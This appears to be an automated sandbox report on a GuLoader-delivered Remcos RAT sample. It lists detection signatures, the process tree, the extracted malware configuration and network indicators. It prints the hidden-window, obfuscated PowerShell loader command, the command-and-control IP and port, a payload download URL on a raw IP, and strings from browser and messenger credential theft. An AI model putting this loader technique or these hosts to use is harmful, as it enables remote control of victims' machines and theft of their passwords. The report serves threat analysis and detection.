Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
87tBuE42ft.exe

Overview

General Information

Sample name:87tBuE42ft.exe
renamed because original name is a hash value
Original sample name:1353d2318463be28ebcffe36398b90b873ee21e2bde3d03f929103729c4b95ea.exe
Analysis ID:1429605
MD5:ef53493176b714d7c8c972a756cfd806
SHA1:c7c08850f9dd1706a2a2a5b456f5de2b25eb200c
SHA256:1353d2318463be28ebcffe36398b90b873ee21e2bde3d03f929103729c4b95ea
Tags:exeRemcosRAT
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Obfuscated command line found
Powershell drops PE file
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • 87tBuE42ft.exe (PID: 6984 cmdline: "C:\Users\user\Desktop\87tBuE42ft.exe" MD5: EF53493176B714D7C8C972A756CFD806)
    • powershell.exe (PID: 6260 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden ; $limpiness=Get-Content 'C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\ravnemorens\Frsteinstanserne\Instantiations.Lil';$Sears=$limpiness.SubString(55857,3);.$Sears($limpiness) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5052 cmdline: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • wab.exe (PID: 4048 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7080 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mmkdxzwbxfiofkbg" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 2028 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mmkdxzwbxfiofkbg" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 4412 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wopvxshvlnbtpypktkp" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 736 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wopvxshvlnbtpypktkp" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 5312 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wopvxshvlnbtpypktkp" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 4856 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hiugykswhvtyselocvbjhr" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": "209.90.234.20:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-YDAEDG", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000007.00000002.4207090075.0000000002B5F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000007.00000002.4209917973.000000000667C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000007.00000002.4209917973.0000000006662000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000001.00000002.2241395545.000000000AB10000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Process Memory Space: wab.exe PID: 4048JoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
              Click to see the 2 entries

              System Summary

              barindex
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mmkdxzwbxfiofkbg", CommandLine: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mmkdxzwbxfiofkbg", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Windows Mail\wab.exe, NewProcessName: C:\Program Files (x86)\Windows Mail\wab.exe, OriginalFileName: C:\Program Files (x86)\Windows Mail\wab.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 4048, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mmkdxzwbxfiofkbg", ProcessId: 7080, ProcessName: wab.exe
              Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6260, TargetFilename: C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\Cricotomy66\Refleksivs\87tBuE42ft.exe
              Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden ; $limpiness=Get-Content 'C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\ravnemorens\Frsteinstanserne\Instantiations.Lil';$Sears=$limpiness.SubString(55857,3);.$Sears($limpiness), ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6260, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", ProcessId: 5052, ProcessName: cmd.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden ; $limpiness=Get-Content 'C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\ravnemorens\Frsteinstanserne\Instantiations.Lil';$Sears=$limpiness.SubString(55857,3);.$Sears($limpiness), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden ; $limpiness=Get-Content 'C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\ravnemorens\Frsteinstanserne\Instantiations.Lil';$Sears=$limpiness.SubString(55857,3);.$Sears($limpiness), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\87tBuE42ft.exe", ParentImage: C:\Users\user\Desktop\87tBuE42ft.exe, ParentProcessId: 6984, ParentProcessName: 87tBuE42ft.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden ; $limpiness=Get-Content 'C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\ravnemorens\Frsteinstanserne\Instantiations.Lil';$Sears=$limpiness.SubString(55857,3);.$Sears($limpiness), ProcessId: 6260, ProcessName: powershell.exe

              Stealing of Sensitive Information

              barindex
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 4048, TargetFilename: C:\ProgramData\remcos\logs.dat
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
              Source: 00000007.00000002.4209917973.000000000667C000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "209.90.234.20:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-YDAEDG", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Source: C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\Cricotomy66\Refleksivs\87tBuE42ft.exeReversingLabs: Detection: 21%
              Source: C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\Cricotomy66\Refleksivs\87tBuE42ft.exeVirustotal: Detection: 33%Perma Link
              Source: 87tBuE42ft.exeReversingLabs: Detection: 21%
              Source: 87tBuE42ft.exeVirustotal: Detection: 33%Perma Link
              Source: Yara matchFile source: 00000007.00000002.4207090075.0000000002B5F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.4209917973.000000000667C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.4209917973.0000000006662000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 4048, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\Cricotomy66\Refleksivs\87tBuE42ft.exeJoe Sandbox ML: detected
              Source: 87tBuE42ft.exeJoe Sandbox ML: detected
              Source: 87tBuE42ft.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 87tBuE42ft.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbuZ source: powershell.exe, 00000001.00000002.2238813435.0000000007B8B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: indows\System.Core.pdbm source: powershell.exe, 00000001.00000002.2239197404.0000000007C03000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.2238813435.0000000007B12000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5f source: powershell.exe, 00000001.00000002.2235356050.000000000337D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.2238813435.0000000007B12000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ier:$DATA.pdb source: powershell.exe, 00000001.00000002.2238813435.0000000007B12000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\87tBuE42ft.exeCode function: 0_2_004069DF FindFirstFileW,FindClose,0_2_004069DF
              Source: C:\Users\user\Desktop\87tBuE42ft.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
              Source: C:\Users\user\Desktop\87tBuE42ft.exeCode function: 0_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D8E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_221610F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_221610F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0040AE51 FindFirstFileW,FindNextFileW,9_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407898
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Usitative\healthless\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Usitative\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

              Networking

              barindex
              Source: Malware configuration extractorURLs: 209.90.234.20
              Source: global trafficTCP traffic: 192.168.2.4:49736 -> 209.90.234.20:2404
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: SERVERHOSH-AS-APServerhoshInternetServiceNL SERVERHOSH-AS-APServerhoshInternetServiceNL
              Source: global trafficHTTP traffic detected: GET /cfEKrtHdTjiVs63.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 172.93.222.219Cache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: unknownTCP traffic detected without corresponding DNS query: 172.93.222.219
              Source: global trafficHTTP traffic detected: GET /cfEKrtHdTjiVs63.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 172.93.222.219Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: wab.exe, 00000009.00000003.2291749128.000000000376A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 92.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: wab.exe, 00000009.00000003.2291749128.000000000376A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 92.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: wab.exe, 00000007.00000002.4226198772.0000000022130000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2277894057.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: wab.exe, wab.exe, 0000000D.00000002.2277894057.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: wab.exe, 00000007.00000002.4226410483.00000000225A0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: wab.exe, 00000007.00000002.4226410483.00000000225A0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: unknownDNS traffic detected: queries for: geoplugin.net
              Source: wab.exe, 00000007.00000002.4209917973.0000000006662000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.4224654706.00000000217E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://172.93.222.219/cfEKrtHdTjiVs63.bin
              Source: bhv145F.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhv145F.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: powershell.exe, 00000001.00000002.2238813435.0000000007BDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microq
              Source: bhv145F.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv145F.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhv145F.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: wab.exe, 00000007.00000002.4209917973.0000000006628000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.4209917973.0000000006662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: wab.exe, 00000007.00000002.4209917973.0000000006662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp%
              Source: wab.exe, 00000007.00000002.4209917973.0000000006662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpD
              Source: wab.exe, 00000007.00000002.4209917973.0000000006662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpP
              Source: wab.exe, 00000007.00000002.4209917973.0000000006662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpS
              Source: wab.exe, 00000007.00000002.4209917973.0000000006662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpm
              Source: wab.exe, 00000007.00000002.4209917973.0000000006662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpy
              Source: 87tBuE42ft.exe, 87tBuE42ft.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: powershell.exe, 00000001.00000002.2237941604.0000000006579000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: bhv145F.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0
              Source: powershell.exe, 00000001.00000002.2236066946.0000000005667000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000001.00000002.2236066946.0000000005511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000001.00000002.2236066946.0000000005667000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: wab.exe, wab.exe, 0000000D.00000002.2277894057.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: wab.exe, wab.exe, 0000000D.00000002.2279953992.000000000371D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2277894057.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: wab.exe, 00000007.00000002.4226198772.0000000022130000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2277894057.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: wab.exe, 00000007.00000002.4226198772.0000000022130000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2277894057.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: wab.exe, 0000000D.00000002.2279953992.000000000371D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comta
              Source: powershell.exe, 00000001.00000002.2238813435.0000000007BAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.Cc
              Source: wab.exe, 00000009.00000002.2292686259.0000000002EE4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: wab.exe, 0000000D.00000002.2277894057.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: powershell.exe, 00000001.00000002.2236066946.0000000005511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000001.00000002.2237941604.0000000006579000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000001.00000002.2237941604.0000000006579000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000001.00000002.2237941604.0000000006579000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000001.00000002.2236066946.0000000005667000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: wab.exe, 00000009.00000002.2292989392.0000000003468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: wab.exe, 00000009.00000002.2292989392.0000000003468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: wab.exe, 00000009.00000003.2291985703.0000000003769000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
